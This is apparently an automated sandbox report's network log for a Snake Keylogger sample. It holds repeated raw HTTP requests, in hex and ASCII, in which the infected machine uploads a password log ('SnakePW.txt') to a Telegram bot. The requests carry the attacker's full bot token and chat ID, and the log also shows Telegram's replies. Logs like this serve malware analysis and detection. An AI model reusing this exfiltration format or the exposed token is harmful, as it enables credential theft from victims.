                            Date: Sun, 26 Jun 2022 07:33:59 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:59 UTC320INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66960,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228839,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            19192.168.2.549787149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:46 UTC32OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d8ef6bb4
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:46 UTC32OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 38 65 66 36 62 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d8ef6bb4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:46 UTC32INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:46 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:46 UTC33INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66766,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228766,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            190192.168.2.550060149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:59 UTC320OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575704ec5f15
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:59 UTC321OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 34 65 63 35 66 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575704ec5f15Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:00 UTC321INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:00 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:00 UTC322INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66961,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228840,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            191192.168.2.550065149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:00 UTC322OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575705233631
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:00 UTC322OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 35 32 33 33 36 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575705233631Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:00 UTC323INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:00 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:00 UTC323INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66962,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228840,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            192192.168.2.550068149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:00 UTC324OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757055edd67
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:00 UTC324OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 35 35 65 64 64 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757055edd67Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:01 UTC325INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:01 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:01 UTC325INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66964,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228840,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            193192.168.2.550070149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:01 UTC325OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757059ccc9d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:01 UTC326OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 35 39 63 63 63 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757059ccc9dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:01 UTC326INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:01 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:01 UTC327INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66965,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228841,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            194192.168.2.550074149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:01 UTC327OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575705d140a8
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:01 UTC327OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 35 64 31 34 30 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575705d140a8Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:01 UTC328INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:01 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:01 UTC328INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66966,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228841,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            195192.168.2.550077149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:01 UTC329OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757060f3d38
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:01 UTC329OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 36 30 66 33 64 33 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757060f3d38Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:02 UTC330INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:02 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:02 UTC330INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
